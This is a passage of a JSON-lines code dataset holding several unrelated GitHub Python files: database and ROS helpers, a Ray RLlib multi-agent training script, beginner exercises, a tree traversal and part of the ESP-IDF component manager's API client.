main(args)","repo_name":"HHHTTY/AS-PD","sub_path":"log/ASPD_dgcnn/sampler_regis/logs/test_sampler_regis.py","file_name":"test_sampler_regis.py","file_ext":"py","file_size_in_byte":17526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"79"} +{"seq_id":"73976683456","text":"from sqlalchemy import create_engine\n\n\ndef make_engine(uri, debug=False):\n if not uri.startswith(\"mysql+pymysql://\"):\n raise ValueError(\"not for MySQL\")\n engine = create_engine(\n uri,\n encoding=\"utf-8\",\n paramstyle=\"pyformat\",\n isolation_level=\"READ COMMITTED\",\n echo=debug\n )\n return engine\n","repo_name":"xuecan/ganggu","sub_path":"ganggu/rdbms/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"42220859406","text":"import struct\n\nimport rospy\n\nfrom esp_now_ros.msg import Packet\n\n\nclass ESPNOWROSInterface:\n def __init__(self, callback=None):\n self.raw_callback = callback\n self.sub = rospy.Subscriber(\"/esp_now_ros/recv\", Packet, self.callback)\n self.pub = rospy.Publisher(\"/esp_now_ros/send\", Packet, queue_size=1)\n\n def callback(self, msg):\n src_address = struct.unpack(\"6B\", msg.mac_address)\n data = msg.data\n if self.raw_callback is not None:\n self.raw_callback(src_address, data)\n\n def send(self, target_address, data, num_trial=1):\n \"\"\"\n Args:\n target_address (list of int)\n data (bytes)\n \"\"\"\n msg = Packet()\n msg.mac_address = struct.pack(\n \"6B\",\n target_address[0],\n target_address[1],\n target_address[2],\n target_address[3],\n target_address[4],\n target_address[5],\n )\n msg.data = data\n for _ in range(num_trial):\n 
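# no delivery ack is available on the publish topic, so the same packet is simply re-published num_trial times\n            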
self.pub.publish(msg)\n","repo_name":"sktometometo/esp_now_ros","sub_path":"python/esp_now_ros/esp_now_ros_interface.py","file_name":"esp_now_ros_interface.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"6726010980","text":"import os\nimport sys\nimport re\nimport shutil\nimport numpy as np\nimport ray\nimport glob\nimport pickle\nimport copy\nimport pandas as pd\nfrom datetime import datetime\nfrom subprocess import Popen, run\nfrom statistics import mean\nfrom math import ceil\nfrom dataclasses import dataclass\nfrom itertools import product, islice, cycle\nfrom typing import Dict, List, Tuple\nfrom ray.tune.logger import pretty_print\nfrom args import get_args\nfrom ray import tune\nfrom ray.rllib.agents import ppo\nfrom ray.tune.registry import register_env\n#from ray.tune.logger import NoopLogger\nfrom ray.rllib.policy.policy import PolicySpec\nfrom ray.rllib.agents.ppo.ppo_torch_policy import PPOTorchPolicy\nfrom ray.rllib.models.catalog import MODEL_DEFAULTS\nimport models\nfrom trade_v4 import Trade, TradeCallback, POLICY_MAPPING_FN\nfrom ray.tune.schedulers import PopulationBasedTraining\nfrom ray.rllib.agents.trainer import COMMON_CONFIG\nfrom ray.rllib.evaluation.metrics import collect_metrics\n\nimport random\nfrom DIRS import RESULTS_DIR\n\nclass ReusablePPOTrainer(ppo.PPOTrainer):\n def reset_config(self, new_config):\n self.cleanup()\n self.setup(new_config)\n return True\n\ndef policies_to_pops(policies:List[str]) -> List[List[str]]:\n pops = [[] for _ in range(args.food_types)]\n for pol in policies:\n try:\n f, a = re.match(r\"f(\\d+)a(\\d+)\", pol).groups()\n pops[int(f)].append(f\"f{f}a{a}\")\n except Exception as e:\n continue\n for pop in pops:\n pop.sort()\n return pops\n\n\ndef get(_worker, _attr):\n return ray.get(_worker.foreach_env.remote( lambda env: getattr(env, _attr)))\n\ndef timestamp():\n return str(datetime.now().replace(microsecond=0))\n\n\ndef all_vs_all(trainer, workerset):\n \"\"\"This function took a while to make.\n - Don't try and configure individual envs on a\n worker, you can only sample one episode at a time.\n - Don't try and change a worker env after you've called\n it, changing the env setting is complicated.\"\"\"\n print(f\"Running all_vs_all for timestamp {timestamp()}\")\n pops = policies_to_pops(list(trainer.config[\"multiagent\"][\"policies\"].keys()))\n matchups = [[a for pop in pops for a in pop]]\n workers = workerset.remote_workers()\n bin = ceil(len(matchups) / len(workers))\n worker_matchups = [matchups[m:m+bin] for m in range(0, len(matchups), bin)]\n futures = []\n agents_in_matchups = list(set([a for wm in worker_matchups for m in wm for a in m]))\n\n render_dir = os.path.join(EXP_DIR, f\"outs-{timestamp()}\")\n os.path.isdir(render_dir) or os.mkdir(render_dir)\n # Give each worker all matchups it needs to run\n for i, w in enumerate(workers):\n # print(f\"Running {worker_matchups[i]} on worker_{i}...\")\n if i >= len(worker_matchups):\n break\n ray.get(w.foreach_env.remote(\n lambda env: env.set_matchups(worker_matchups[i])))\n\n ray.get(w.foreach_env_with_context.remote(\n lambda env, ctx: env.set_render_path(render_dir+f\"/{ctx.vector_index}-\")))\n\n\n for _ in worker_matchups[i]:\n futures.append(w.sample.remote())\n\n\n batches = ray.get(futures)\n metrics = collect_metrics(workerset.local_worker(), workerset.remote_workers(), timeout_seconds=999999)\n os.listdir(render_dir) or os.rmdir(render_dir)\n #assert == 
len(metrics[\"policy_reward_mean\"])\n if len(metrics[\"policy_reward_mean\"]) != len(agents_in_matchups):\n print(f\"agents in matchup: {agents_in_matchups}\")\n print(f\"Returned: {metrics['policy_reward_mean']}\")\n assert len(metrics[\"policy_reward_mean\"]) == len(agents_in_matchups)\n assert len(metrics[\"policy_reward_mean\"]) == len(trainer.config[\"multiagent\"][\"policies\"])\n return metrics\n\n\ndef add_pol(pop: int):\n config[\"env_config\"][\"latest_agent_ids\"][pop] += 1\n pol_id = config[\"env_config\"][\"latest_agent_ids\"][pop]\n pol_name = f\"f{pop}a{pol_id}\"\n\n #print(f\"Adding {pol_name}\")\n config[\"multiagent\"][\"policies\"][pol_name] = pol_spec\n trainer.add_policy(pol_name,\n PPOTorchPolicy,\n policy_mapping_fn=policy_mapping_fn,\n policies_to_train=list(config[\"multiagent\"][\"policies\"].keys()),\n config=config)\n return pol_name\n\n\ndef add_pol_by_name(pop: int, name: str):\n pop, a = re.match(r\"f(\\d+)a(\\d+)\", name).groups()\n config[\"env_config\"][\"latest_agent_ids\"][int(pop)] = max(\n config[\"env_config\"][\"latest_agent_ids\"][int(pop)], int(a))\n\n #print(f\"Adding {pol_name}\")\n config[\"multiagent\"][\"policies\"][name] = pol_spec\n trainer.add_policy(name,\n PPOTorchPolicy,\n policy_mapping_fn=policy_mapping_fn,\n policies_to_train=list(config[\"multiagent\"][\"policies\"].keys()),\n config=config)\n return name\n\ndef rm_pol(pol_name: str):\n #print(f\"Removing {pol_name}\")\n config[\"multiagent\"][\"policies\"].pop(pol_name)\n trainer.remove_policy(pol_name,\n policy_mapping_fn=POLICY_MAPPING_FN,\n policies_to_train=list(config[\"multiagent\"][\"policies\"].keys()))\n\ndef add_row(df, result):\n new_row = pd.DataFrame(result[\"custom_metrics\"], index=[1])\n for stat in [\"min\", \"max\", \"mean\"]:\n met = f\"episode_reward_{stat}\"\n new_row[met] = result[met]\n return pd.concat([df, new_row], ignore_index=True, sort=False)\n\ndef save(trainer, path):\n # make a list of all previous checkpoints\n prev_checks = []\n for f in glob.glob(f\"{os.path.join(path, '*')}\"):\n if re.match(\".*checkpoint-(\\d+)\", f):\n prev_checks.append(f)\n \n trainer.save_checkpoint(path)\n with open(os.path.join(path, \"policies.p\"), \"wb\") as f:\n pickle.dump(list(trainer.config[\"multiagent\"][\"policies\"].keys()), f)\n # delete previous checkpoints\n for f in prev_checks:\n os.remove(f)\n\ndef load(trainer, path):\n print(\"Loading checkpoint from\", path)\n global policies, results_df, RESULT_FILE\n results_df = pd.DataFrame()\n if os.path.exists(RESULT_FILE):\n results_df = pd.read_csv(RESULT_FILE)\n\n check = -1\n newest_checkpoint = \"\"\n for f in glob.glob(f\"{os.path.join(path, '*')}\"):\n m = re.match(\".*checkpoint-(\\d+)\", f)\n if m:\n new_check = int(m.groups()[0])\n if new_check > check:\n check = new_check\n newest_checkpoint = f\n check_path = os.path.join(path, newest_checkpoint)\n\n if newest_checkpoint:\n\n assert new_check > 0\n print(f\"Restoring from {check_path}\")\n for pol in policies.copy().keys():\n print(f\"Removing {pol}\")\n rm_pol(pol)\n with open(os.path.join(path,\"policies.p\"), \"rb\") as f:\n saved_pols = pickle.load(f)\n assert len(saved_pols) > 1\n for pol in saved_pols:\n print(f\"Adding {pol}\")\n add_pol_by_name(trainer, pol)\n\n trainer.reset_config(config)\n trainer.load_checkpoint(check_path)\n trainer._iteration = new_check\n loaded_pops = policies_to_pops(saved_pols)\n assert all(len(pop) > 0 for pop in loaded_pops)\n matchups = [[a for pop in pops for a in pop]]\n assert len(matchups) > 0\n 
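# broadcast the restored matchups to the rollout workers so sampling resumes with the loaded policies\r\n        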
print(\"Setting matchups\", matchups)\n\n for w in trainer.workers.remote_workers():\n w.foreach_env.remote(\n lambda env: env.set_matchups(matchups))\n\n\nif __name__ == \"__main__\":\n\n args = get_args()\n CLASS_DIR = os.path.join(RESULTS_DIR, f\"{args.class_name}\")\n os.path.exists(CLASS_DIR) or os.mkdir(CLASS_DIR)\n\n EXP_DIR = os.path.join(CLASS_DIR, f\"{args.name}\")\n os.path.exists(EXP_DIR) or os.mkdir(EXP_DIR)\n\n RESULT_FILE=os.path.join(EXP_DIR,\"results.txt\")\n EVAL_FILE = os.path.join(EXP_DIR, \"eval.csv\")\n\n\n\n pops = [[f\"f{f}a{a}\" for a in range(args.pop_size//args.food_types)] for f in range(args.food_types)]\n matchups = [[a for pop in pops for a in pop]]\n env_config = {\"window\": (args.window, args.window),\n \"grid\": (args.gx, args.gy),\n \"food_types\": 2,\n \"latest_agent_ids\": [(args.pop_size//args.food_types)-1 for _ in range(args.food_types)],\n \"matchups\": matchups,\n \"episode_length\": args.episode_length,\n \"fire_radius\": args.fire_radius,\n \"move_coeff\": args.move_coeff,\n \"no_multiplier\": args.no_multiplier,\n \"num_piles\": args.num_piles,\n \"dist_coeff\": args.dist_coeff,\n \"caps\": args.caps,\n \"ineq_coeff\": args.ineq_coeff,\n \"death_prob\": args.death_prob,\n \"twonn_coeff\": args.twonn_coeff,\n \"pickup_coeff\": args.pickup_coeff,\n \"share_health\": args.share_health,\n \"respawn\": args.respawn,\n \"fires\": [(args.fires[i], args.fires[i+1]) for i in range(0, len(args.fires), 2)],\n \"foods\": [(*args.foods[i:i+3],) for i in range(0, len(args.foods), 3)],\n \"survival_bonus\": args.survival_bonus,\n \"health_baseline\": args.health_baseline,\n \"punish\": args.punish,\n \"spawn_agents\": args.spawn_agents,\n \"spawn_food\": args.spawn_food,\n \"light_coeff\": args.light_coeff,\n \"punish_coeff\": args.punish_coeff,\n \"food_agent_start\": args.food_agent_start,\n \"food_env_spawn\": args.food_env_spawn,\n \"day_night_cycle\": args.day_night_cycle,\n \"night_time_death_prob\": args.night_time_death_prob,\n \"day_steps\": args.day_steps,\n \"policy_mapping_fn\": POLICY_MAPPING_FN,\n \"vocab_size\": 0}\n\n test_env = Trade(env_config)\n obs_space = test_env.observation_space\n act_space = test_env.action_space\n\n pol_config = {\n \"model\": getattr(models, args.model),\n \"gamma\": 0.99,\n }\n pol_spec = PolicySpec(None, obs_space, act_space, pol_config)\n\n policies = {pol: pol_spec for pop in pops for pol in pop}\n policy_mapping_fn = POLICY_MAPPING_FN\n\n env_name = \"trade_v4\"\n\n batch_size = args.batch_size\n config={\n # Environment specific\n \"env\": env_name,\n \"env_config\": env_config,\n \"callbacks\": TradeCallback,\n \"recreate_failed_workers\": True,\n \"log_level\": \"ERROR\",\n \"framework\": \"torch\",\n \"horizon\": args.episode_length * args.num_agents,\n \"num_gpus\": 1,\n \"evaluation_config\": {\n \"env_config\": {\"agents\": matchups[0]},\n \"explore\": False\n },\n \"evaluation_duration\": 10, # make this number of envs per worker\n \"evaluation_num_workers\" : 4,\n \"num_workers\": 4,\n \"custom_eval_function\": all_vs_all,\n\n \"num_cpus_per_worker\": 2,\n \"num_envs_per_worker\": 10,\n \"batch_mode\": 'truncate_episodes',\n \"lambda\": 0.95,\n \"gamma\": .99,\n \"model\": pol_config[\"model\"],\n \"clip_param\": 0.03,\n \"entropy_coeff\": args.entropy_coeff,\n 'vf_loss_coeff': 0.25,\n \"num_sgd_iter\": 5,\n \"sgd_minibatch_size\": batch_size,\n \"train_batch_size\": batch_size,\n 'rollout_fragment_length': 50,\n 'lr': args.learning_rate,\n # Method specific\n \"multiagent\": {\n \"policies\": 
policies,\n \"policy_mapping_fn\": policy_mapping_fn,\n },\n \"logger_config\": {\n \"type\": \"ray.tune.logger.NoopLogger\",\n\n }}\n\n pbt_interval = args.checkpoint_interval if args.pbt else 10_000_000_000_000\n print(config)\n \n\n\n print(\"SPAWNING RAY\")\n if args.ip:\n ray.init(address=args.ip, _redis_password=\"longredispassword\")\n\n print(\"REGISTER_ENV\")\n register_env(env_name, lambda config: Trade(config))\n env = Trade(env_config)\n \n print(\"MAKE TRAINER\")\n trainer = ReusablePPOTrainer(config=config, env=Trade)\n\n print(\"BEGINNING LOOP\")\n load(trainer, EXP_DIR)\n\n def run_training():\n global results_df\n prev_result = {'custom_metrics': {}}\n i = 0\n while True:\n i += 1\n for j in range(40*(args.pop_size)):\n print(\"Training\")\n result = trainer.train()\n print(\"Trained\")\n # trainer.train() returns a result with the same custom_metric dict\n # if no new episodes were completed. in this case, skip logging.\n if not result[\"custom_metrics\"] or result[\"custom_metrics\"] == prev_result['custom_metrics']:\n print(\"Skipping no new results\")\n continue\n\n print(\"Writing results\")\n result[\"custom_metrics\"][\"step\"] = trainer._iteration\n results_df = add_row(results_df, result)\n # we remove the step from the custom_metrics dict so that\n # we can skip equal results\n del result[\"custom_metrics\"][\"step\"]\n prev_result = result\n\n tmp_result_file = RESULT_FILE+\"-tmp\"\n results_df.round(2).to_csv(tmp_result_file, index=False)\n run(f\"mv -f {tmp_result_file} {RESULT_FILE}\".split())\n\n eval_mets = trainer.evaluate()\n eval_mets[\"evaluation\"][\"custom_metrics\"][\"step\"] = trainer._iteration\n eval_df = pd.DataFrame.from_dict(eval_mets['evaluation'][\"custom_metrics\"], orient=\"index\").T\n eval_df.round(2).to_csv(EVAL_FILE, mode='a', header=(not os.path.exists(EVAL_FILE)), index=False)\n print(eval_mets)\n\n if i % 20 == 0:\n print(f\"Saving trainer for timestamp {timestamp()}\")\n save(trainer, EXP_DIR)\n\n\n def run_interactive():\n obss = test_env.reset()\n test_env.render_interactive()\n states = {}\n for agent in test_env.agents:\n policy = trainer.get_policy(agent)\n states[agent] = policy.get_initial_state()\n\n for i in range(400):\n actions = {}\n for agent in obss.keys():\n policy = trainer.get_policy(agent)\n actions[agent], states[agent], logits = policy.compute_single_action(obs=np.array(obss[agent]), state=states[agent], policy_id=agent)\n # override agent action with custom input if specified\n act = input(f'act for {test_env.agents.index(agent)}:')\n # only process first char\n if len(act) > 1:\n act = act[0]\n # map udlr to vim keys\n vim=\"k j h l\".split()\n if act in vim:\n act = vim.index(act)\n if act != \"\":\n actions[agent] = int(act)\n\n obss, rews, dones, infos = test_env.step({agent: action for agent, action in actions.items() if not test_env.compute_done(agent)})\n test_env.render_interactive()\n if dones[\"__all__\"]:\n print(\"--------FINAL-STEP--------\")\n #test_env.render()\n print(\"game over\")\n break\n if args.interactive:\n run_interactive()\n else:\n run_training()\n","repo_name":"jarbus/trade","sub_path":"evo.py","file_name":"evo.py","file_ext":"py","file_size_in_byte":15054,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"32277826022","text":"#Título\nprint(\"Postulantes a un empleo\\n\")\n\n#Carga de datos\ncant_preguntas = int(input(\"Ingrese el número de preguntas realizadas: \"))\npostulante_1 = input(\"Ingrese el nombre del 1º 
postulante: \")\nnro_correcta_1 = int(input(\"Ingrese la cantidad de respuestas correctas: \"))\npostulante_2 = input(\"Ingrese el nombre del 2º postulante: \")\nnro_correcta_2 = int(input(\"Ingrese la cantidad de respuestas correctas: \"))\npostulante_3 = input(\"Ingrese el nombre del 3º postulante: \")\nnro_correcta_3 = int(input(\"Ingrese la cantidad de respuestas correctas: \"))\nprint(\"\")\n\n#Procesos\nporcent_1 = nro_correcta_1 * (100/cant_preguntas)\nporcent_2 = nro_correcta_2 * (100/cant_preguntas)\nporcent_3 = nro_correcta_3 * (100/cant_preguntas)\n\nif porcent_1 >= 90:\n nivel_1 = \"Nivel Superior\"\nelif 75 <= porcent_1 < 90:\n nivel_1 = \"Nivel Medio\"\nelif 50 <= porcent_1 < 75:\n nivel_1 = \"Nivel Regular\"\nelse:\n nivel_1 = \"Fuera de Nivel\"\n\nif porcent_1 >= 90:\n nivel_2 = \"Nivel Superior\"\nelif 75 <= porcent_2 < 90:\n nivel_2 = \"Nivel Medio\"\nelif 50 <= porcent_2 < 75:\n nivel_2 = \"Nivel Regular\"\nelse:\n nivel_2 = \"Fuera de Nivel\"\n\nif porcent_3 >= 90:\n nivel_3 = \"Nivel Superior\"\nelif 75 <= porcent_3 < 90:\n nivel_3 = \"Nivel Medio\"\nelif 50 <= porcent_3 < 75:\n nivel_3 = \"Nivel Regular\"\nelse:\n nivel_3 = \"Fuera de Nivel\"\n\nprint(postulante_1 + \": \", nivel_1)\nprint(postulante_2 + \": \", nivel_2)\nprint(postulante_3 + \": \", nivel_3)\n\nmax_porcent = max(porcent_1, porcent_2, porcent_3)\nganador = postulante_1\n\nif max_porcent == porcent_2:\n ganador = postulante_2\nelif max_porcent == porcent_3:\n ganador = postulante_3\n\n print(\"\\nGanador del puesto:\", ganador)","repo_name":"BrisaDiaz/utn-python","sub_path":"ficha-5/ficha-5-ej-13.py","file_name":"ficha-5-ej-13.py","file_ext":"py","file_size_in_byte":1722,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"38213676793","text":"student_attendance = {\"Pedro\": 96, \"João\": 100, \"Maria\": 89}\n\nfor student, attendance in student_attendance.items():\n print(f\"{student}: {attendance}\")\n\nprint()\nprint(student_attendance.items())\n\n*head, tail = [1, 2, 3, 4, 5, 6]\nprint(head)\nprint(tail)\n\nprimeiro, *ultimos = [1, 2, 3, 4, 5, 6]\nprint(primeiro)\nprint(ultimos)\n\n\nstudents = [\n {'name': 'Jose', 'school': 'Computing', 'grades': (66, 77, 88)},\n {'name': 'Amado', 'school': 'Computing', 'grades': (56, 67, 78)},\n {'name': 'Batista', 'school': 'Computing', 'grades': (100, 89, 91)},\n {'name': 'Terezo', 'school': 'Computing', 'grades': (86, 81, 91)}\n\n]\n\n\ndef average_grade_all_students(student_list):\n total = 0\n count = 0\n for student in student_list:\n total += sum(student['grades'])\n count += len(student['grades'])\n return total / count\n\n\nprint(average_grade_all_students(students))\n","repo_name":"pivotostes/restAPIwithFlask","sub_path":"src/24_Destructuring_variables/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"9844094889","text":"\"\"\"\nleft -> right\ntop -> bottom\n\n解题思路:\n- level:0, if len(L) == level 说明可以新建一个层级放数据\n- self.L[level].append(node.val)\n\n- node.left 重复调用处理, 唯一不同的是level+1\n- node.right 重复调用处理, 唯一不同的是level+1\n\"\"\"\n# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution(object):\n def __init__(self):\n self.L = []\n\n def levelOrder(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: List[List[int]]\n \"\"\"\n if root is None:\n return []\n\n def 
traverse(node, level):\n # 从1层开始, 初始化创建个新的\n if len(self.L) == level:\n self.L.append([])\n self.L[level].append(node.val)\n\n if node.left:\n traverse(node.left, level + 1)\n if node.right:\n traverse(node.right, level + 1)\n\n traverse(root, 0)\n return self.L","repo_name":"Linjiayu6/LeetCode","sub_path":"Algorithms/tree/fundamentals/levelorder_traverse.py","file_name":"levelorder_traverse.py","file_ext":"py","file_size_in_byte":1077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"39001101571","text":"import os\nimport platform\nimport re\nfrom collections import namedtuple\nfrom functools import wraps\nfrom io import open\n\nimport requests\nfrom cachecontrol import CacheControlAdapter\nfrom cachecontrol.caches import FileCache\nfrom cachecontrol.heuristics import ExpiresAfter\nfrom requests.adapters import HTTPAdapter\nfrom requests_file import FileAdapter\nfrom requests_toolbelt import MultipartEncoder, MultipartEncoderMonitor\nfrom schema import Schema, SchemaError\nfrom tqdm import tqdm\n\n# Import whole module to avoid circular dependencies\nimport idf_component_tools as tools\nfrom idf_component_tools.__version__ import __version__\nfrom idf_component_tools.environment import detect_ci, getenv_int\nfrom idf_component_tools.file_cache import FileCache as ComponentFileCache\nfrom idf_component_tools.messages import warn\nfrom idf_component_tools.semver import SimpleSpec, Version\n\nfrom .api_client_errors import (\n KNOWN_API_ERRORS,\n APIClientError,\n ComponentNotFound,\n NetworkConnectionError,\n NoRegistrySet,\n StorageFileNotFound,\n VersionNotFound,\n)\nfrom .api_schemas import (\n API_INFORMATION_SCHEMA,\n API_TOKEN_SCHEMA,\n COMPONENT_SCHEMA,\n ERROR_SCHEMA,\n TASK_STATUS_SCHEMA,\n VERSION_UPLOAD_SCHEMA,\n)\nfrom .manifest import BUILD_METADATA_KEYS, Manifest\n\ntry:\n from typing import TYPE_CHECKING, Any, Callable\n\n if TYPE_CHECKING:\n from idf_component_tools.sources import BaseSource\nexcept ImportError:\n pass\n\nTaskStatus = namedtuple('TaskStatus', ['message', 'status', 'progress', 'warnings'])\n\nDEFAULT_TIMEOUT = (6.05, 30.1) # Connect timeout # Read timeout\n\nDEFAULT_API_CACHE_EXPIRATION_MINUTES = 0\nMAX_RETRIES = 3\n\n\ndef env_cache_time():\n try:\n return getenv_int(\n 'IDF_COMPONENT_API_CACHE_EXPIRATION_MINUTES',\n DEFAULT_API_CACHE_EXPIRATION_MINUTES,\n )\n except ValueError:\n warn(\n 'IDF_COMPONENT_API_CACHE_EXPIRATION_MINUTES is set to a non-numeric value. '\n 'Please set the variable to the number of minutes. Disabling caching.'\n )\n return DEFAULT_API_CACHE_EXPIRATION_MINUTES\n\n\ndef create_session(\n cache=False, # type: bool\n cache_path=None, # type: str | None\n cache_time=None, # type: int | None\n token=None, # type: str | None\n): # type: (...) 
-> requests.Session\n if cache_path is None:\n cache_path = ComponentFileCache().path()\n\n cache_time = cache_time or env_cache_time()\n if cache and cache_time:\n api_adapter = CacheControlAdapter(\n max_retries=MAX_RETRIES,\n heuristic=ExpiresAfter(minutes=cache_time),\n cache=FileCache(os.path.join(cache_path, '.api_client')),\n )\n else:\n api_adapter = HTTPAdapter(max_retries=MAX_RETRIES)\n\n session = requests.Session()\n session.headers['User-Agent'] = user_agent()\n session.auth = TokenAuth(token)\n\n session.mount('http://', api_adapter)\n session.mount('https://', api_adapter)\n session.mount('file://', FileAdapter())\n\n return session\n\n\ndef filter_versions(\n versions, version_filter, component_name\n): # type: (list[dict], str, str) -> list[dict]\n if version_filter and version_filter != '*':\n requested_version = SimpleSpec(str(version_filter))\n filtered_versions = [v for v in versions if requested_version.match(Version(v['version']))]\n\n if not filtered_versions or not any([bool(v.get('yanked_at')) for v in filtered_versions]):\n return filtered_versions\n\n clause = requested_version.clause.simplify()\n # Some clauses don't have an operator attribute, need to check\n if (\n hasattr(clause, 'operator')\n and clause.operator == '=='\n and filtered_versions[0]['yanked_at']\n ):\n warn(\n 'The version \"{}\" of the \"{}\" component you have selected has '\n 'been yanked from the repository due to the following reason: \"{}\". '\n 'We recommend that you update to a different version. '\n 'Please note that continuing to use a yanked version can '\n 'result in unexpected behavior and issues with your project.'.format(\n clause.target,\n component_name.lower(),\n filtered_versions[0]['yanked_message'],\n )\n )\n else:\n filtered_versions = [v for v in filtered_versions if not v.get('yanked_at')]\n else:\n filtered_versions = [v for v in versions if not v.get('yanked_at')]\n\n return filtered_versions\n\n\nclass ComponentDetails(Manifest):\n def __init__(\n self,\n download_url=None, # type: str | None # Direct url for tarball download\n documents=None, # type: list[dict[str, str]] | None # List of documents of the component\n license=None, # type: dict[str, str] | None # Information about license\n examples=None, # type: list[dict[str, str]] | None # List of examples of the component\n *args,\n **kwargs\n ):\n super(ComponentDetails, self).__init__(*args, **kwargs)\n self.download_url = download_url\n self.documents = documents\n self.license = license # type: ignore\n self.examples = examples\n\n\ndef handle_4xx_error(error): # type: (requests.Response) -> str\n try:\n json = ERROR_SCHEMA.validate(error.json())\n name = json['error']\n messages = json['messages']\n except SchemaError as e:\n raise APIClientError(\n 'API Endpoint \"{}: returned unexpected error description:\\n{}'.format(error.url, str(e))\n )\n except ValueError:\n raise APIClientError('Server returned an error in unexpected format')\n\n exception = KNOWN_API_ERRORS.get(name, APIClientError)\n if isinstance(messages, list):\n raise exception('\\n'.join(messages))\n else:\n raise exception(\n 'Error during request:\\n{}\\nStatus code: {} Error code: {}'.format(\n str(messages), error.status_code, name\n )\n )\n\n\ndef join_url(*args): # type: (*str) -> str\n \"\"\"\n Joins given arguments into an url and add trailing slash\n \"\"\"\n parts = [part[:-1] if part and part[-1] == '/' else part for part in args]\n return '/'.join(parts)\n\n\ndef auth_required(f):\n @wraps(f)\n def wrapper(self, *args, **kwargs):\n 
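# fail fast: endpoints wrapped with @auth_required cannot be used without a configured token\n        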
if not self.auth_token:\n raise APIClientError('API token is required')\n return f(self, *args, **kwargs)\n\n return wrapper\n\n\nclass TokenAuth(requests.auth.AuthBase):\n def __init__(self, token): # type: (str | None) -> None\n self.token = token\n\n def __call__(self, request):\n if self.token:\n request.headers['Authorization'] = 'Bearer %s' % self.token\n return request\n\n\ndef user_agent(): # type: () -> str\n \"\"\"\n Returns user agent string.\n \"\"\"\n\n environment_info = [\n '{os}/{release} {arch}'.format(\n os=platform.system(), release=platform.release(), arch=platform.machine()\n ),\n 'python/{version}'.format(version=platform.python_version()),\n ]\n\n ci_name = detect_ci()\n if ci_name:\n environment_info.append('ci/{}'.format(ci_name))\n\n user_agent = 'idf-component-manager/{version} ({env})'.format(\n version=__version__,\n env='; '.join(environment_info),\n )\n\n return user_agent\n\n\ndef _component_request(request, component_name):\n \"\"\"Get component information from storage. Used by `versions` and `component`.\"\"\"\n try:\n return request('get', ['components', component_name.lower()], schema=COMPONENT_SCHEMA)\n except StorageFileNotFound:\n raise ComponentNotFound('Component \"{}\" not found'.format(component_name))\n\n\nclass APIClient(object):\n def __init__(self, base_url=None, storage_url=None, source=None, auth_token=None):\n # type: (str | None, str | None, BaseSource | None, str | None) -> None\n self.base_url = base_url\n self._storage_url = storage_url\n self._frontend_url = None\n self.source = source\n self.auth_token = auth_token\n\n def _version_dependencies(self, version):\n dependencies = []\n for dependency in version.get('dependencies', []):\n # Support only idf and service sources\n if dependency['source'] == 'idf':\n source = tools.sources.IDFSource({})\n else:\n source = self.source or tools.sources.WebServiceSource({})\n\n is_public = dependency.get('is_public', False)\n require = dependency.get('require', True)\n require_string = 'public' if is_public else ('private' if require else 'no')\n\n dependencies.append(\n tools.manifest.ComponentRequirement(\n name='{}/{}'.format(dependency['namespace'], dependency['name']),\n version_spec=dependency['spec'],\n source=source,\n public=is_public,\n require=require_string,\n optional_requirement=tools.manifest.OptionalRequirement.fromdict(dependency),\n )\n )\n\n return tools.manifest.filter_optional_dependencies(dependencies)\n\n def _base_request(\n self,\n url, # type: str\n session, # type: requests.Session\n method, # type: str\n path, # type: list[str]\n data=None, # type: dict | None\n json=None, # type: dict | None\n headers=None, # type: dict | None\n schema=None, # type: Schema | None\n use_storage=False, # type: bool\n ):\n # type: (...) -> dict\n endpoint = join_url(url, *path)\n\n timeout = DEFAULT_TIMEOUT # type: float | tuple[float, float]\n try:\n timeout = float(os.environ['IDF_COMPONENT_SERVICE_TIMEOUT'])\n except ValueError:\n raise APIClientError(\n 'Cannot parse IDF_COMPONENT_SERVICE_TIMEOUT. 
It should be a number in seconds.'\n        )\n    except KeyError:\n        pass\n\n    try:\n        response = session.request(\n            method,\n            endpoint,\n            data=data,\n            json=json,\n            headers=headers,\n            timeout=timeout,\n            allow_redirects=True,\n        )\n\n        if response.status_code == 204:  # NO CONTENT\n            return {}\n        elif 400 <= response.status_code < 500:\n            if use_storage:\n                if response.status_code == 404:\n                    raise StorageFileNotFound()\n                raise APIClientError(\n                    'Error during request.\\nStatus code: {}'.format(response.status_code)\n                )\n\n            handle_4xx_error(response)\n\n        elif 500 <= response.status_code < 600:\n            raise APIClientError(\n                'Internal server error happened while processing '\n                'request to:\\n{}\\nStatus code: {}'.format(endpoint, response.status_code)\n            )\n\n        response_json = response.json()\n    except requests.exceptions.ConnectionError as e:\n        raise NetworkConnectionError(str(e))\n    except requests.exceptions.RequestException:\n        raise APIClientError('HTTP request error')\n\n    try:\n        if schema is not None:\n            schema.validate(response_json)\n    except SchemaError as e:\n        raise APIClientError(\n            'API Endpoint \"{}\" returned unexpected JSON:\\n{}'.format(endpoint, str(e))\n        )\n\n    except (ValueError, KeyError, IndexError):\n        raise APIClientError('Unexpected component server response')\n\n    return response_json\n\n    @property\n    def storage_url(self):\n        if not self._storage_url:\n            self._storage_url = self.api_information()['components_base_url']\n        return self._storage_url\n\n    @property\n    def frontend_url(self):\n        if not self._frontend_url:\n            self._frontend_url = re.sub(r'/api/?$', '', self.base_url)\n\n        return self._frontend_url\n\n    def _request(cache=False, use_storage=False):  # type: (APIClient | bool, bool) -> Callable\n        def decorator(f):  # type: (Callable[..., Any]) -> Callable\n            @wraps(f)  # type: ignore\n            def wrapper(self, *args, **kwargs):\n                url = self.base_url\n                if use_storage:\n                    url = self.storage_url\n\n                if url is None:\n                    raise NoRegistrySet(\n                        'The current operation 